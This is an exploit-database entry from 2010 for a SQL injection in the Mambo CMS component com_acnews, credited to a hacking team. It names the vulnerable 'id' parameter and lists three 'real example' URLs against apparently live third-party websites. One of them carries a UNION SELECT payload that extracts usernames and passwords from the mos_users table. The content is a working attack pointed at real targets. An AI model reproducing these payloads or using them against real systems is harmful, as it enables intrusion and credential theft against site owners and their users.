Mambo Component com_acnews [id] SQL Injection

2010-02-16T00:00:00
ID 1337DAY-ID-10924
Type zdt
Reporter Zero Bits
Modified 2010-02-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================
Mambo Component com_acnews [id] SQL Injection 
=============================================


Mambo Component com_acnews [id] | SQL Injection

Author: Zero Bits & Xzit3
Team: Ro0T-MaFia
Member's: Zero Bits, CMD, Jeferx, Xzit3, XP3RM4 & Jeferx
Date: 15/02/2010
Contact: [email protected] - [email protected]

Country: Venezuela - Mexico
############################

Vulnerability's:

[+] SQL Injection:
Error: You have an error in your SQL syntax.


BUG: index.php?lang=en&option=com_acnews&task=view&id=188(SQLi)


Real example: 

http://www.artcom.net/index.php?lang=en&option=com_acnews&task=view&id=-188'&Itemid=136&page=0 (Web Vuln.)

http://www.artcom.de/index.php?lang=en&option=com_acnews&task=view&id=331%27&page=0


http://www.artcommedia.com/index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users--


###########################



#  0day.today [2018-01-08]  #